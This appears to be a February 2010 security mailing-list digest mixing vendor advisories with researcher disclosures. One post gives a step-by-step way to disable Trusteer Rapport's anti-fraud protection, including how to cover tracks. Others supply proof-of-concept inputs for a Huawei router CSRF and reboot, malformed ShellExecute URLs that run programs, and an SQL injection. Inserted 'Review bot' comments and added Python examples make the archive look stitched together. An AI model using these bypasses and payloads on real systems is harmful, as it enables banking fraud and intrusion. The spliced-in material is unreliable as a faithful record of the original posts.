Trusteer Rapport Security Circumvention

2010-02-16 Thread barkley
Hi,


Trusteer is an innovative software to combat fraud, thus its global uptake in 
the financial sector. Trusteer also seems quite adamant that their software is 
bullet-proof; their website pretty much sums it up. However, on having a closer 
look and some tinkering, I discovered a complete no-brainer vector for 
circumventing Trusteer's security. I've tested this on various XP platforms 
successfully; please feel free to notify the vendor as you wish and/or to 
publish whatever you feel appropriate under the circumstances.


http://www.trusteer.com/solutions
http://www.trusteer.com/product-0
http://www.trusteer.com/product/technology
Trusteer Rapport locks down your browser once you connect to a sensitive 
website such as your bank. Any malicious software that tries to ride on the 
browser is left out of the locked down browser, and cannot access your 
sensitive information and transactions. Rapport also locks down communication 
between your browser and the bank, preventing any network-based attack from 
diverting traffic to fraudulent locations.


The following illustrates how malware on entering a system by whichever means, 
and on detecting Trusteer's services, can easily (automated/scripted) disable 
Trusteer's security for whatever malevolent purposes.


Step-by-step illustration of how to easily circumvent Trusteer's security.

Firstly, disable Trusteer's service (RapportMgmtService.exe) in your active 
Hardware Profile. Trusteer doesn't protect this option, thus this is a good 
starting point for now.
i.e.
[HKEY_CURRENT_CONFIG\System\CurrentControlSet\Enum\ROOT\LEGACY_RAPPORTMGMTSERVICE\]
"CSConfigFlags"=dword:0001

NOTE: This in fact disables Trusteer's service (RapportMgmtService.exe) in the 
Services.msc GUI
i.e.
Services.msc > "Rapport Management Service" > "Log On" > "Hardware Profile" > 
"Disabled"


On the very next reboot (at least one reboot is required to disable the kernel 
driver, RapportPG.sys), Trusteer's service (RapportMgmtService.exe) should now 
be inactive/disabled, and thus you'll be able to rename Trusteer's now 
unprotected folders.
i.e. Command Prompt
C:\> cd \"Program Files"
C:\> rename Trusteer TrusBeer

NOTE: At this point the web browser's not protected by Trusteer, nor are 
Trusteer's software & system settings protected, thus pretty much open to your 
imagination.


The following step is not required, especially seeing as Trusteer's service 
(RapportMgmtService.exe) was disabled previously in the active Hardware 
Profile. However, should you also wish to reconfigure Trusteer's now 
unprotected drivers & services to start manually, or even to disable/delete 
them completely, you may or may not have to reboot one more time, as the 
following step may need another reboot to take advantage of the unprotected 
folders renamed in the previous step.
i.e. Command Prompt
C:\> sc config RapportMgmtService start= demand
C:\> sc config RapportPG start= demand


Should you wish to cover your tracks (you'll also have to clear event logs), 
rename Trusteer's home folder back to the original and restore the Hardware 
Profile registry entry.
i.e.
[HKEY_CURRENT_CONFIG\System\CurrentControlSet\Enum\ROOT\LEGACY_RAPPORTMGMTSERVICE\]
"CSConfigFlags"=dword:

i.e. Command Prompt
C:\> cd \"Program Files"
C:\> rename TrusBeer Trusteer


Cheers

Andrew Barkley
(-_-)


Huawei HG510 CSRF, Auth Bypass, DoS

2010-02-16 Thread ivan . markovic
Hello,


Huawei HG510 is a device offered by the Serbian telecom operator to provide 
an ADSL Internet connection.
Administration of settings on this device is allowed only from the local LAN, 
but not only via the private IP address (e.g. 192.168.1.1): you can also 
access it via the public IP address (again only from the local LAN).

There is no CSRF protection, so we can create malicious web pages and perform 
some CSRF attacks.
If the user is logged on to his device, we can change passwords or other 
settings.

POC:

http://PUBLIC_IP_OF_USER/password.cgi?sysPassword=BASE64_NEW_PASSWORD


When testing this I found one strange behavior with /rebootinfo.cgi (the 
reboot device script).
Normally, for all this CSRF the user must be logged into the device web 
interface, but if we request 
http://PUBLIC_IP_OF_USER/rebootinfo.cgi, basic authentication is bypassed and 
the device is rebooted.

So we have CSRF + Authentication Bypass that leads to DoS of the end user.

If anyone has any questions about this, please contact me.


Best regards,
Ivan Markovic


IE address bar characters into a small feature

2010-02-16 Thread info
#
# Securitylab.ir
#
# Application Info:
# Name: Internet Explorer
# Version: 8.0
#
Vulnerability: IE address bar characters into a small feature 
In my IE 8, a URL entered in the address bar automatically has "\" (0x5c) 
transformed into "/" (0x2f).
Example: www.securitylab.ir\a is converted to www.securitylab.ir/a
I recently found that some phishing sites take advantage of this feature to 
bypass some security checks; this is hereby noted.
#
# Discovered By: Pouya Daneshmand
# Website: http://securitylab.ir
# Contacts: admin[at]securitylab.ir & whh_iran[AT]yahoo.com
###
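As an added example (not from the post), the following Python shows why the backslash rewrite matters to a URL filter: a host blocklist that extracts the host by splitting only on '/', '?' and '#' sees a different host than IE 8 does, so a phishing URL written with a backslash slips past it until the filter canonicalizes the URL the way the browser does. The blocklist entry phish.example is constructed.

```python
# IE 8, as the post reports, rewrites every backslash (0x5c) typed into the
# address bar as a forward slash (0x2f) before resolving the URL. A filter
# that extracts the host without the same rewrite reads the URL differently
# from the browser. Added example; the blocklist entry is constructed.

PHISHING_HOSTS = {"phish.example"}      # constructed blocklist entry


def ie_normalize(url: str) -> str:
    """Mirror the IE 8 behaviour from the post: every '\\' becomes '/'.

    The post's own example: 'www.securitylab.ir\\a' -> 'www.securitylab.ir/a'.
    """
    return url.replace("\\", "/")


def naive_host(url: str) -> str:
    """Host as a filter sees it when it splits the authority only on the
    delimiters RFC 3986 names ('/', '?', '#') and ignores backslashes."""
    _, sep, rest = url.partition("://")
    authority = rest if sep else url
    for delim in "/?#":
        authority = authority.split(delim, 1)[0]
    authority = authority.rsplit("@", 1)[-1]    # drop userinfo
    return authority.split(":", 1)[0].lower()   # drop port


def browser_host(url: str) -> str:
    """Host as IE 8 resolves it: canonicalize first, then extract."""
    return naive_host(ie_normalize(url))


def is_blocked(url: str, canonicalize: bool = True) -> bool:
    """Blocklist lookup. canonicalize=False reproduces the bypassable filter."""
    host = browser_host(url) if canonicalize else naive_host(url)
    return host in PHISHING_HOSTS


if __name__ == "__main__":
    url = "http://phish.example\\login"
    print("filter sees:", naive_host(url), "-> blocked:", is_blocked(url, False))
    print("IE resolves:", browser_host(url), "-> blocked:", is_blocked(url))
```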


Insomnia : ISVA-100216.1 - Windows URL Handling Vulnerability

2010-02-16 Thread Brett Moore
__

 Insomnia Security Vulnerability Advisory: ISVA-100216.1
___

 Name: Windows URL Handling Vulnerability 
 Released: 16 February 2010
  
 Vendor Link: 
http://www.microsoft.com/
  
 Affected Products:
Windows 2000, Windows XP, Windows 2003, Windows Vista
 
 Original Advisory: 
http://www.insomniasec.com/advisories/ISVA-100216.1.htm
 
 Researcher: 
Brett Moore, Insomnia Security
http://www.insomniasec.com
___

___

 Description
___

A flaw exists with the handling of malformed URLs passed through
the ShellExecute() API. The vulnerability does not directly cause
an issue within Windows itself; however, applications that call 
the flawed API may be vulnerable to various attacks, one of which 
is shown in this report.

___

 Details
___

The vulnerability is reached when the malformed URL contains #: 
and can be used to reference local files.

Two such examples are shown here;
acrobat://test/#://../../c:/windows/system32/calc.exe
or
anything://test/#://../../c:/windows/system32/calc.exe

The results will be different dependent on where the URL is used
and which OS platform is in use. 

Some examples are shown here;

Start->Run
Calc.exe is executed without prompt

IE URL Bar or HREF
User is prompted to execute calc.exe

Word Document
User is prompted to open acrobat link

PDF Document
Calc.exe is executed without prompt

Firefox
Firefox will not follow the URL

Safari
Calc.exe is executed without prompt  
  
___

 Potential Exploit
___
  
Safari will not access the local file through the standard
file:// link, but will execute the local file through the malformed
link.

One method of executable delivery is through the onenote:// 
URL protocol if Microsoft OneNote is installed.

OneNote will automatically open and process a onenote file shared
over an SMB share. Any executables stored within the onenote file
will be cached locally. This is done by downloading the embedded
executables and storing them in a known location.

C:/Users/[USERNAME]/AppData/Local/Microsoft/OneNote/12.0/OneNoteOfflineCache_Files/

This file can then be executed through the URL handling vulnerability
leading to an automatic code execution issue through Safari.

Obviously there are some requirements for this exploit;
+ the target user name must be known
+ Microsoft OneNote must be installed
+ SMB access out must be allowed
  
___

 Solution
___

Microsoft have released a security update to address this issue;
http://www.microsoft.com/technet/security/Bulletin/MS10-002.mspx
http://www.microsoft.com/technet/security/Bulletin/MS10-007.mspx

___

 Legals
___

The information is provided for research and educational purposes
only. Insomnia Security accepts no liability in any form whatsoever
for any direct or indirect damages associated with the use of this
information.
___
 
Insomnia Security Vulnerability Advisory: ISVA-100216.1
___




Pogodny CMS SQL vulnerabilities

2010-02-16 Thread Maciej Gojny

# Exploit Title: [Pogodny CMS SQL injection]
# Date: [08.02.2010]
# Author: [Ariko-Security]
# Software Link: [http://www.cms.michalin.pl/moduly/pogodny/]
# Version: [ALL]
# Tested on: [freebsd / ubuntu]

 { Ariko-Security - Advisory #2/2/2010 } =

  SQL injection vulnerability in Pogodny CMS


Vendor's Description of Software:
# http://www.cms.michalin.pl/moduly/pogodny/  (PL)
# vendor's DEMO http://www.cms.kr.media.pl/

Dork:
#pogodny CMS

Application Info:
# Name: pogodny CMS
# Versions: ALL

Vulnerability Info:
# Type: SQL injection Vulnerability
# Risk: High

Fix: 
# N/A Vendor notified 08.02.2010

It was found that "pogodny CMS" does not properly validate the "id" parameter
value.

Solution:
# Input validation of "id" parameter should be corrected.


Vulnerability:
# http://[HOST]/?modul=niusy&id=61[Sqli]

Credit:
# Discovered By: MG
# Website: http://Ariko-security.com


Ariko-Security
v...@ariko-security.com
tel.: +48512946012 (Mo-Fr 10.00-20.00 CET)



VMSA-2010-0003 ESX Service Console update for net-snmp

2010-02-16 Thread VMware Security Team

------------------------------------------------------------------------
   VMware Security Advisory

Advisory ID:   VMSA-2010-0003
Synopsis:  ESX Service Console update for net-snmp
Issue date:2010-02-16
Updated on:2010-02-16 (initial release of advisory)
CVE numbers:   CVE-2009-1887
------------------------------------------------------------------------

1. Summary

   Update for Service Console package net-snmp

2. Relevant releases

   VMware ESX 3.5 without patch ESX350-201002401-SG

3. Problem Description

 a. Service Console package net-snmp updated

This patch updates the service console package for net-snmp,
net-snmp-utils, and net-snmp-libs to version
net-snmp-5.0.9-2.30E.28. This net-snmp update fixes a divide-by-
zero flaw in the snmpd daemon. A remote attacker could issue a
specially crafted GETBULK request that could cause the snmpd daemon
to fail.

This vulnerability was introduced by an incorrect fix for
CVE-2008-4309.

The Common Vulnerabilities and Exposures Project (cve.mitre.org) has
assigned the name CVE-2009-1887 to this issue.

Note: After installing the previous patch for net-snmp
(ESX350-200901409-SG), running the snmpbulkwalk command with the
parameter -CnX results in no output, and the snmpd daemon stops.

The following table lists what action remediates the vulnerability
(column 4) if a solution is available.

VMware Product   Product Version   Running on   Replace with/Apply Patch
==============   ===============   ==========   ========================
VirtualCenter    any               Windows      not affected

hosted *         any               any          not affected

ESXi             any               ESXi         not affected

ESX              4.0               ESX          not affected
ESX              3.5               ESX          ESX350-201002401-SG
ESX              3.0.3             ESX          affected, patch pending
ESX              2.5.5             ESX          not affected

  * hosted products are VMware Workstation, Player, ACE, Server, Fusion.

4. Solution

   Please review the patch/release notes for your product and version
   and verify the md5sum of your downloaded file.

   ESX 3.5
   ---
   ESX350-201002401-SG
   http://download3.vmware.com/software/vi/ESX350-201002401-SG.zip
   md5sum: a91428cb6bc2da794f581aefd5eef010
   http://kb.vmware.com/kb/1017660

5. References

   CVE numbers
   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1887

------------------------------------------------------------------------
6. Change log

2010-02-16  VMSA-2010-0003
Initial security advisory after release of patches for ESX 3.5
on 2010-02-16.

------------------------------------------------------------------------
7. Contact

E-mail list for product security notifications and announcements:
http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce

This Security Advisory is posted to the following lists:

  * security-announce at lists.vmware.com
  * bugtraq at securityfocus.com
  * full-disclosure at lists.grok.org.uk

E-mail:  security at vmware.com
PGP key at: http://kb.vmware.com/kb/1055

VMware Security Center
http://www.vmware.com/security

VMware security response policy
http://www.vmware.com/support/policies/security_response.html

General support life cycle policy
http://www.vmware.com/support/policies/eos.html

VMware Infrastructure support life cycle policy
http://www.vmware.com/support/policies/eos_vi.html

Copyright 2010 VMware Inc.  All rights reserved.


MITKRB5-SA-2010-001 [CVE-2010-0283] krb5-1.7 KDC denial of service

2010-02-16 Thread Tom Yu

MITKRB5-SA-2010-001

MIT krb5 Security Advisory 2010-001
Original release: 2010-02-16
Last update: 2010-02-16

Topic: krb5-1.7 KDC denial of service

CVE-2010-0283
krb5-1.7 KDC denial of service

CVSSv2 Vector: AV:N/AC:L/Au:N/C:N/I:N/A:C/E:F/RL:O/RC:C

CVSSv2 Base Score:  7.8

Access Vector:  Network
Access Complexity:  Low
Authentication: None
Confidentiality Impact: None
Integrity Impact:   None
Availability Impact:Complete

CVSSv2 Temporal Score:  6.4

Exploitability: Functional
Remediation Level:  Official Fix
Report Confidence:  Confirmed

SUMMARY
===

Improper input validation in the KDC can cause an assertion failure
and process termination.  A functional exploit exists, but is not
known to be publicly circulated.  Releases prior to krb5-1.7 did not
contain the vulnerable code.

This is an implementation vulnerability in MIT krb5, and is not a
vulnerability in the Kerberos protocol.

IMPACT
==

An unauthenticated remote attacker can send an invalid request to a
KDC process that will cause it to crash due to an assertion failure,
creating a denial of service.

AFFECTED SOFTWARE
=

* KDC in MIT krb5-1.7 and later

* Prerelease (alpha test) code for krb5-1.8 is also vulnerable.

FIXES
=

* The upcoming krb5-1.7.2 release will contain a fix for this
  vulnerability.

* The final krb5-1.8 release will contain a fix for this
  vulnerability.

* For the krb5-1.7 and krb5-1.7.1 releases, apply the following patch:

diff --git a/src/kdc/do_as_req.c b/src/kdc/do_as_req.c
index 52fbda5..680e6a1 100644
- --- a/src/kdc/do_as_req.c
+++ b/src/kdc/do_as_req.c
@@ -137,6 +137,11 @@ process_as_req(krb5_kdc_req *request, krb5_data *req_pkt,
 session_key.contents = 0;
 enc_tkt_reply.authorization_data = NULL;
 
+if (request->msg_type != KRB5_AS_REQ) {
+status = "msg_type mismatch";
+errcode = KRB5_BADMSGTYPE;
+goto errout;
+}
 errcode = kdc_make_rstate(&state);
 if (errcode != 0) {
status = "constructing state";
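Review bot: the new `goto errout` fires before kdc_make_rstate() has populated `state`, so everything on the errout path must tolerate a NULL state; the fast_util.c hunk in this same patch widens the guard in kdc_fast_handle_error() to `if (!state || !state->armor_key)`, which indicates the two hunks form a unit and should not be backported separately (taking only this one would trade the assertion failure for a NULL dereference on the error path). It is also worth confirming that `state` is initialised to NULL earlier in process_as_req() so the cleanup never sees an indeterminate pointer.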
diff --git a/src/kdc/do_tgs_req.c b/src/kdc/do_tgs_req.c
index 12180ff..c8cf692 100644
- --- a/src/kdc/do_tgs_req.c
+++ b/src/kdc/do_tgs_req.c
@@ -135,6 +135,8 @@ process_tgs_req(krb5_data *pkt, const krb5_fulladdr *from,
 retval = decode_krb5_tgs_req(pkt, &request);
 if (retval)
 return retval;
+if (request->msg_type != KRB5_TGS_REQ)
+return KRB5_BADMSGTYPE;
 
 /*
  * setup_server_realm() sets up the global realm-specific data pointer.
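Review bot: the early `return KRB5_BADMSGTYPE;` sits immediately after decode_krb5_tgs_req() has succeeded and allocated `request`, and unlike the do_as_req.c hunk it does not route through a cleanup label, so the decoded request appears to be leaked on this path; freeing it before returning, or jumping to the function's existing cleanup if there is one, would be cleaner.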
diff --git a/src/kdc/fast_util.c b/src/kdc/fast_util.c
index d88e0cb..2639047 100644
- --- a/src/kdc/fast_util.c
+++ b/src/kdc/fast_util.c
@@ -384,7 +384,7 @@ krb5_error_code kdc_fast_handle_error
 krb5_data *encoded_e_data = NULL;
 
 memset(outer_pa, 0, sizeof(outer_pa));
- -if (!state->armor_key)
+if (!state || !state->armor_key)
return 0;
 fx_error = *err;
 fx_error.e_data.data = NULL;
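Review bot: widening the guard to `if (!state || !state->armor_key)` is correct in effect (no state means no armor key, so the error is returned without FAST wrapping), but a short comment explaining how `state` can be NULL here, namely the new msg_type rejection in process_as_req() that exits before kdc_make_rstate() runs, would keep a later reader from treating the NULL test as dead code and removing it.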



  This patch is also available at

  http://web.mit.edu/kerberos/advisories/2010-001-patch.txt

  A PGP-signed patch is available at

  http://web.mit.edu/kerberos/advisories/2010-001-patch.txt.asc


* The above patch will apply to krb5-1.8 prerelease code if whitespace
  is ignored.

REFERENCES
==

This announcement is posted at:

  http://web.mit.edu/kerberos/advisories/MITKRB5-SA-2010-001.txt

This announcement and related security advisories may be found on the
MIT Kerberos security advisory page at:

http://web.mit.edu/kerberos/advisories/index.html

The main MIT Kerberos web page is at:

http://web.mit.edu/kerberos/index.html

CVSSv2:

http://www.first.org/cvss/cvss-guide.html
http://nvd.nist.gov/cvss.cfm?calculator&adv&version=2

CVE: CVE-2010-0283
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0283

ACKNOWLEDGMENTS
===

Thanks to Emmanuel Bouillon (NATO C3 Agency) for discovering and
reporting this vulnerability.

CONTACT
===

The MIT Kerberos Team security contact address is
.  When sending sensitive information,
please PGP-encrypt it using the following key:

pub   2048R/8B8DF501 2010-01-15 [expires: 2011-02-01]
uid MIT Kerberos Team Security Contact 

DETAILS
===

In new code introduced in the KDC for the krb5-1.7 release, code that
handles authorization data (handle_tgt_authdata()) contains a call to
assert() that ensures that the function arguments are consistent with
value of the msg_type field of the request that it is processing.
This assertion can fail because the msg_type can be inconsistent with
the ASN.1 tag that previously-executed code used to choose whether to
process the request as a request for initial tickets (AS-REQ) or as a
request for additional tickets (TGS-REQ).

REVISION HISTORY
================

2010-02-16  original release

Copyright (C) 2010 Massachusetts Institute of Technology
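As an added illustration (not MIT's code), this Python models the consistency check the patch above introduces: it parses the outer ASN.1 APPLICATION tag and the inner msg-type of a DER-encoded KDC-REQ, dispatches on the tag the way the KDC does, and rejects the request with KRB5_BADMSGTYPE when the two disagree instead of letting the mismatch reach an assert(). The sample requests are constructed and carry only pvno and msg-type; the tag and msg-type values 10 (AS-REQ) and 12 (TGS-REQ) are those of RFC 4120.

```python
KRB5_AS_REQ = 10    # AS-REQ: [APPLICATION 10], msg-type 10 (RFC 4120)
KRB5_TGS_REQ = 12   # TGS-REQ: [APPLICATION 12], msg-type 12 (RFC 4120)


def read_tlv(buf: bytes, pos: int):
    """Read one DER TLV at buf[pos]; return (tag, value, position after it).

    Single-byte tags and definite lengths only, which covers KDC-REQ framing.
    """
    if pos + 2 > len(buf):
        raise ValueError("truncated TLV header")
    tag, length = buf[pos], buf[pos + 1]
    pos += 2
    if length & 0x80:                       # long form: next n bytes hold the length
        n = length & 0x7F
        if n == 0 or pos + n > len(buf):
            raise ValueError("bad long-form length")
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    if pos + length > len(buf):
        raise ValueError("truncated TLV value")
    return tag, buf[pos:pos + length], pos + length


def parse_kdc_req(pkt: bytes):
    """Return (application_tag_number, msg_type) from a DER-encoded KDC-REQ.

    Only the outer tag and the [2] msg-type field are examined; pvno, padata
    and req-body are skipped over.
    """
    outer_tag, seq, _ = read_tlv(pkt, 0)
    if outer_tag & 0xE0 != 0x60:            # class APPLICATION, constructed
        raise ValueError("not an APPLICATION-tagged constructed value")
    app_num = outer_tag & 0x1F
    seq_tag, body, _ = read_tlv(seq, 0)
    if seq_tag != 0x30:                     # SEQUENCE
        raise ValueError("KDC-REQ must wrap a SEQUENCE")
    msg_type = None
    pos = 0
    while pos < len(body):
        ctx_tag, inner, pos = read_tlv(body, pos)
        if ctx_tag == 0xA2:                 # [2] msg-type INTEGER
            int_tag, val, _ = read_tlv(inner, 0)
            if int_tag != 0x02:
                raise ValueError("msg-type is not an INTEGER")
            msg_type = int.from_bytes(val, "big", signed=True)
    if msg_type is None:
        raise ValueError("msg-type field missing")
    return app_num, msg_type


def build_kdc_req(app_num: int, msg_type: int) -> bytes:
    """Constructed sample request: [APPLICATION app_num] SEQUENCE { pvno [1] 5,
    msg-type [2] msg_type }. A real KDC-REQ also carries padata and req-body;
    they are omitted because the tag/msg-type check does not look at them.
    """
    pvno = bytes([0xA1, 0x03, 0x02, 0x01, 0x05])
    mtype = bytes([0xA2, 0x03, 0x02, 0x01, msg_type])
    seq = bytes([0x30, len(pvno) + len(mtype)]) + pvno + mtype
    return bytes([0x60 | app_num, len(seq)]) + seq


def dispatch(pkt: bytes):
    """Model the KDC dispatch: the outer ASN.1 tag selects the handler, and
    the handler (post-fix) rejects a msg-type that disagrees with it instead of
    letting the inconsistency reach an assert() further down.

    Returns (handler_name, errcode) where errcode is None on success.
    """
    app_num, msg_type = parse_kdc_req(pkt)
    if app_num == KRB5_AS_REQ:
        handler = "process_as_req"
    elif app_num == KRB5_TGS_REQ:
        handler = "process_tgs_req"
    else:
        return None, "unknown application tag %d" % app_num
    if msg_type != app_num:                 # the check the patch adds
        return handler, "KRB5_BADMSGTYPE"
    return handler, None


if __name__ == "__main__":
    for tag, mtype in [(10, 10), (12, 12), (10, 12), (12, 10)]:
        print(tag, mtype, dispatch(build_kdc_req(tag, mtype)))
```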

VUPEN Security Research - OpenOffice Word Document Processing Heap Overflow Vulnerabilities

2010-02-16 Thread VUPEN Security Research
VUPEN Security Research - OpenOffice.org Word Document Handling Heap 
Overflow Vulnerabilities


http://www.vupen.com/english/research.php


I. BACKGROUND
-

OpenOffice.org (OO.o or OOo), commonly known as OpenOffice, is an
open source software application suite available for a number of
different computer operating systems. It is distributed as free
software and written using its own GUI toolkit. It supports the
ISO/IEC standard OpenDocument Format (ODF) for data interchange
as its default file format, as well as Microsoft Office formats
among others. (Wikipedia)


II. DESCRIPTION
- 


VUPEN Vulnerability Research Team discovered critical vulnerabilities
affecting OpenOffice.org.

The first vulnerability is caused by a heap overflow error when
processing malformed "sprmTDefTable" records in a Word document,
which could be exploited by attackers to execute arbitrary code.

The second vulnerability is caused by a heap overflow error when
processing malformed "sprmTSetBrc" records in a Word document,
which could be exploited by attackers to compromise a vulnerable
system.


III. AFFECTED PRODUCTS


OpenOffice.org versions prior to 3.2


IV. Exploits - PoCs & Binary Analysis


In-depth binary analysis of the vulnerabilities and exploits/PoCs
have been released by VUPEN Security through the VUPEN Exploits &
PoCs Service :

http://www.vupen.com/exploits


V. SOLUTION
 


Upgrade to OpenOffice.org version 3.2


VI. CREDIT
-- 


The vulnerabilities were discovered by Nicolas JOLY of VUPEN Security


VII. ABOUT VUPEN Security
-

VUPEN is a leading IT security research company providing vulnerability
management services to allow enterprises and organizations to eliminate
vulnerabilities before they can be exploited, ensure security policy
compliance and meaningfully measure and manage risks.

VUPEN also provides research services for security vendors (antivirus,
IDS, IPS,etc) to supplement their internal vulnerability research efforts
and quickly develop vulnerability-based and exploit-based signatures,
rules, and filters, and proactively protect their customers against
potential threats.

* VUPEN Vulnerability Notification Service:

http://www.vupen.com/english/services

* VUPEN Exploits and In-Depth Vulnerability Analysis:

http://www.vupen.com/exploits


VIII. REFERENCES
--

http://www.vupen.com/english/advisories/2010/0366
http://www.openoffice.org/security/cves/CVE-2009-3301-3302.html
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3301
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3302



IX. DISCLOSURE TIMELINE
--- 


2009-11-03 - Vendor notified
2009-11-05 - Vendor response
2009-11-10 - Status update received
2009-12-21 - Status update received
2010-02-02 - Status update received
2010-02-12 - Coordinated public Disclosure





Re: Joomla (Jw_allVideos) Remote File Download Vulnerability

2010-02-16 Thread lafrancevi
Hello!



This is no longer relevant; this extension is now at version 3.1. This was 
grabbed from a greez post.


[ MDVSA-2010:038 ] maildrop

2010-02-16 Thread security


 ___

 Mandriva Linux Security Advisory MDVSA-2010:038
 http://www.mandriva.com/security/
 ___

 Package : maildrop
 Date: February 16, 2010
 Affected: Corporate 4.0, Enterprise Server 5.0
 ___

 Problem Description:

 A vulnerability has been discovered and corrected in maildrop:
 
 main.C in maildrop 2.3.0 and earlier, when run by root with the -d
 option, uses the gid of root for execution of the .mailfilter file in
 a user's home directory, which allows local users to gain privileges
 via a crafted file (CVE-2010-0301).
 
 The updated packages have been patched to correct this issue.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0301
 ___

 Updated Packages:

 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  



Enomaly ECP: Multiple vulnerabilities in VMcasting protocol & implementation.

2010-02-16 Thread sam . johnston



Synopsis

Enomaly ECP up to and including v3.0.4 is believed to contain an insecure
silent update mechanism that could allow a remote attacker to execute
arbitrary code as root, and to inject or modify VM workloads for execution
within the user environment or to replay older, insecure workloads.

Both the Enomaly ECP implementation and the VMcasting protocol itself are
believed to be vulnerable.

Background

Enomaly ECP is management software for virtual machines in cloud computing
environments.

Description

Sam Johnston (http://samj.net/) of Australian Online Solutions
(http://www.aos.net.au) reported that the vmfeed module, an insecure
implementation of the insecure VMcasting protocol (http://www.vmcasting.org/),
includes a silent update mechanism that downloads and executes Python code
from Enomaly's corporate web server (http://enomaly.com/fileadmin/eggs/)
over HTTP, without authentication or integrity checks. The code is triggered
when the "application/python-egg" MIME type is encountered.

The module also contains functionality for downloading workloads (virtual
machines) from a feed which is itself retrieved over HTTP. While the VMcasting
protocol (http://www.vmcasting.org/) describes a mechanism for digitally
signing payloads, the mechanism is not implemented and there is no requirement
to transfer feeds securely (e.g. over HTTPS). The implementation itself
actively rejects URLs that do not start with "http" or "ftp" with an error.

The module has the following feeds hardcoded:
 - Enomalism VMCasting Test Feed [http://enomalism.com/vmcast_appliances.php]
 - VMCasting Production Module Feed [http://enomalism.com/vmcast_modules.php]

Impact

Combined with the ability to intercept requests to Enomaly's corporate web
server by other means such as ARP or DNS spoofing, or to compromise the server
itself or any intermediary server, it may be possible to execute arbitrary
commands as the root user on any server requesting the feeds. It may also be
possible for an attacker to run workloads of their choice, to modify existing
workloads and to replay old, known-insecure workloads (even if signed).

Workaround

Resolve enomalism.com and enomaly.com to 127.0.0.1 in affected servers' hosts
files or migrate to OpenECP which includes fixes for the vulnerabilities.

Resolution

There is no resolution at this time as the feature cannot be disabled. The
vendor did not confirm whether subsequent/future releases [will] address the
problem.

History

2009-11-02 Open source distributions for Enomaly ECP removed from Internet.
2010-01-06 Email request for open source Enomaly ECP code denied by CEO.
2010-02-03 Public discussion of vulnerability, verified in current source.
2010-02-03 Strategic Advisor & Board Member claims "Many of the items have
been addressed in [Service Provider Edition and soon to be released High
Assurance] editions. We will review your comments above for future inclusion
into our product road map". Fails to identify which issues remain.
2010-02-09 OpenECP forked from Enomaly ECP, resolves vulnerabilities.
2010-02-09 Chief Technologist claims "ECP 3.0 is a significantly different
product than 2.0 servicing different market needs. [...] Technically ECP2.0
was Enomalism 2.0, not the Elastic Computing platform."
2010-02-10 Changelogs showing common lineage are removed from Internet.
2010-02-?? http://src.enomaly.com is restored claiming "Our current platform,
Enomaly ECP Service Provider Edition, is a completely different product."
2010-02-16 Vulnerability report released unverified.



Multiple Stored XSS in XOOPS 2.4.4 Admin Section

2010-02-16 Thread beenudel1986
# Greetz to all Darkc0de, AI, ICW, AH Members
# Shoutz to r45c4l,j4ckh4x0r,silic0n,smith,baltazar,d3hydr8,FB1H2S, 
lowlz,Eberly,Sumit,
#
# Author: Beenu Arora
# 
# Home  : www.BeenuArora.com
# 
# Email : beenudel1...@gmail.com 
# 
# Share the c0de! 
# 
 
# 
# Exploit: Multiple Stored XSS in XOOPS 2.4.4 Admin Section
# 
# AppSite: www.xoops.org
# 
# Tested Version : 2.4.4
# 
# Request: POST
#
# Sample URLs: http://localhost/xoops/htdocs/modules/system/admin/groupperm.php
# http://localhost/xoops/htdocs/modules/system/admin.php
#
# 
 


[USN-901-1] Squid vulnerabilities

2010-02-16 Thread Marc Deslauriers
===
Ubuntu Security Notice USN-901-1  February 16, 2010
squid vulnerabilities
CVE-2009-2855, CVE-2010-0308
===

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 8.04 LTS
Ubuntu 8.10
Ubuntu 9.04
Ubuntu 9.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 6.06 LTS:
  squid   2.5.12-4ubuntu2.5

Ubuntu 8.04 LTS:
  squid   2.6.18-1ubuntu3.1

Ubuntu 8.10:
  squid   2.7.STABLE3-1ubuntu2.2

Ubuntu 9.04:
  squid   2.7.STABLE3-4.1ubuntu1.1

Ubuntu 9.10:
  squid   2.7.STABLE6-2ubuntu2.1

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

It was discovered that Squid incorrectly handled certain auth headers. A
remote attacker could exploit this with a specially-crafted auth header
and cause Squid to go into an infinite loop, resulting in a denial of
service. This issue only affected Ubuntu 8.10, 9.04 and 9.10.
(CVE-2009-2855)

It was discovered that Squid incorrectly handled certain DNS packets. A
remote attacker could exploit this with a specially-crafted DNS packet
and cause Squid to crash, resulting in a denial of service. (CVE-2010-0308)


Updated packages for Ubuntu 6.06 LTS:

Updated packages for Ubuntu 8.04 LTS:


Chrome Password Manager Cross Origin Weakness (CVE-2010-0556)

2010-02-16 Thread VSR Advisories

   Virtual Security Research, LLC.
  http://www.vsecurity.com/
  Security Advisory


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Advisory Name: Chrome Password Manager Cross Origin Weakness
 Release Date: 2010-02-15
  Application: Google Chrome Web Browser
 Versions: 4.0.249.78, 3.0.195.38, and likely earlier
 Severity: Medium/Low
   Author: Timothy D. Morgan 
Vendor Status: Update Released [2]
CVE Candidate: CVE-2010-0556
Reference: http://www.vsecurity.com/resources/advisory/20100215-1/

